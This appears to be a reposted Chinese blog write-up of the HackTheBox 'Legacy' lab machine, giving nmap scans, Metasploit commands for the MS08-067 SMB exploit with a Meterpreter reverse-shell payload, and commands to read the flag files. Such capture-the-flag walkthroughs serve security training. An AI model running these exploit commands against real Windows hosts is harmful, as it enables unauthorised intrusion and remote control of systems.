HackTheBox-Machines--Legacy

2024-03-29 12:04
文章标签 machines hackthebox legacy

本文主要是介绍HackTheBox-Machines--Legacy,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 1 端口扫描
  • 2 测试思路
  • 3 445端口漏洞测试
  • 4 flag


Legacy 测试过程


1 端口扫描


nmap -sC -sV 10.129.227.181

在这里插入图片描述


2 测试思路


  目标开启了135、139、445端口,445 SMB服务存在很多可利用漏洞,所以测试点先从445端口开始。而且在Nmap扫描结果中,可以看到系统是Windows XP,所以寻找Windows XP相关的SMB漏洞。


3 445端口漏洞测试


  1.搜索SMB服务相关漏洞

nmap -p 445 --srcipt vuln 10.129.227.181

  2.漏洞exploit

search exploit/windows/smb

  在输出中存在很多可利用exploit
在这里插入图片描述

 use exploit/windows/smb/ms08_067_netapi set payload windows/meterpreter/reverse_tcpset rhosts 10.129.227.181set rport 445run

在这里插入图片描述

在这里插入图片描述


4 flag


type C:\Documents and Settings\john\Desktop\user.txt
type  C:\Documents and Settings\Administrator\Desktop\root.txt

在这里插入图片描述

这篇关于HackTheBox-Machines--Legacy的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/858543

相关文章

npm i --legacy-peer-deps

npm ERR! Fix the upstream dependency conflict, or retrynpm ERR! this command with --force, or --legacy-peer-depsnpm ERR! to accept an incorrect (and potentially broken) dependency resolution. 1、原因

算法——支持向量机(support vector machines,SVM)

简介:个人学习分享,如有错误,欢迎批评指正 支持向量机(Support Vector Machine, SVM)是一种监督学习算法,广泛用于分类任务,也可以用于回归和异常检测等问题。SVM的核心思想是通过在特征空间中找到一个最优的分隔超平面,将不同类别的数据点分开,使得各类别之间的间隔最大化。 一、SVM的基本概念 1. 超平面 在二维空间中,超平面就是一条直线,而在高维空间中,超平面

Soul Machines——AI生成虚拟主播或虚拟人,模拟真人交互

一、Soul Machines介绍 Soul Machines 致力于开发高度逼真的虚拟人和数字化身,通过结合人工智能、计算机图形学和面部动画技术,打造具有情感交互能力的虚拟角色。这些虚拟角色可以应用于客户服务、教育、健康护理等领域,为用户提供更具人性化和互动性的体验。 二、Soul Machines 的核心功能 1. 虚拟数字人 虚拟数字人是 Soul Machines 的核心产品,这些

PCIe学习笔记(20)--- 中断(1)--- Legacy

MSI 与 INTx Message是不同的东西 Command: Interrupt Acknowledge for INTR(PIC output) (INTx# inputs) PIC returns a 8-bit value called the Interrupt Vector 获得VECTOR SMP, from PIC to IO APIC APIC bus:

HackTheBox-MonitorsThree【更新中】

总体思路 信息收集&端口利用 nmap -p1-10000 monitorsthree.htb 目标主要开放了22和80端口,还有一个8084的websnp端口 先看80端口,是一个产品界面,介绍了他们的一些防火墙、网络解决方案等等 注意到界面中有一个登录按钮,点击查看 在尝试弱口令和万能密码无果后,看到下方还存在一个忘记密码的界面,打开它 这里提示我们需要输入用户

hadoop执行分词时报错:System times on machines may be out of sync. Check system time and time zones.

解决办法: 1、安装ntpdate工具 yum -y install ntp ntpdate 2、 设置系统时间与网络时间同步 ntpdate cn.pool.ntp.org

[Meachines] [Easy] Legacy nmap 漏洞扫描脚本深度发现+MS08-067

信息收集 IP AddressOpening Ports10.10.10.4TCP:135,139,445 $ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC

解决执行npm run dev报错node: --openssl-legacy-provider is not allowed in NODE_OPTIONS

问题: 最近下载了一个开源系统,执行npm install很顺利,以为大功告成,结果运行npm run dev时报错node: --openssl-legacy-provider is not allowed in NODE_OPTIONS 解决方法: 应用程序配置(package.json),移除对--openssl-legacy-provider的引用。找到scripts关于Open

HackTheBox-Linux基础

Linux 结构 历史       许多事件导致了第一个 Linux 内核的创建,并最终创建了 Linux 操作系统 (OS),从 1970 年 Ken Thompson 和 Dennis Ritchie(当时都在 AT&T 工作)发布 Unix 操作系统开始。伯克利软件发行版 (BSD) 于 1977 年发布,但由于它包含 AT&T 拥有的 Unix 代码,因此由此产生的诉讼限制了 BS

点击率预测《Field-aware Factorization Machines for CTR Prediction》论文精读

请点击上方“AI公园”,关注公众号 上次发的这篇文章,由于排版的问题,导致了部分手机无法正常显示公式,经过几个朋友提醒才发现,今天重新发布一次。 摘要:点击率预测在计算机广告中有着重要的作用。在这个应用中,二阶多项式映射和因子分解模型应用的非常广泛。最近,各种种类的因子分解机(FM),领域因子分解机(FFM)在各个点击率预测的竞赛中表现出了其他模型都好的效果。基于我们获胜的经验,本文我们建立了